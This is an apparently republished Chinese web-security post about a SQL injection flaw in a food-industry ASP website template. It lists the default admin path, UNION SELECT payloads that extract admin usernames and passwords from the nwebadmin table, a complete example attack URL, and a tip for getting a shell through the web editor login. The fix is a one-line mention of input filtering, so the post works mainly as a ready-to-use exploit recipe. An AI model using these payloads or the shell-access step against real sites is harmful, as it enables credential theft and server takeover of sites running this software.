企成食品行业网站源码1.0 注入漏洞及修复

企成食品行业网站源码1.0 注入漏洞及修复 - 网站

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] by Mr.DzYfrom www.0855.tv这系统好像是在05年开发的。是不是原创作品，有待考证！改改用吧。。地址：http://www.2cto.com/ym/201006/21198.html默认后台：system/index.aspEXP：union select 1,2,3,usernam......

by Mr.DzY
from www.0855.tv

这系统好像是在05年开发的。是不是原创作品，有待考证！改改用吧。。

地址：http://www.2cto.com/ym/201006/21198.html
默认后台：system/index.asp

EXP：
union select 1,2,3,username,password,6,7,8,9,10,11,12 from nwebadmin
union select 1,2,3,username,password,6,7,8,9,10,11,12,13 from nwebadmin

测试
:
http://www.2cto.com /cms/shipin/NewsView.asp?id=63 union select 1,2,3,username,password,6,7,8,9,10,11,12 from nwebadmin

拿shell:登陆后台访问：webeditor/admin_login.asp

修复：过滤。。。但是还得注意cookies哦。

inurl:略

骑士CMS(74cms)sql注入漏洞及修复 - 网站安全 - 自学

Discuz 1.5 配合NGINX二次解析爆路径BUG - 网站安全

子栏目

企成食品行业网站源码1.0 注入漏洞及修复 - 网站

最新评论

添加评论

更多文章推荐

添加评论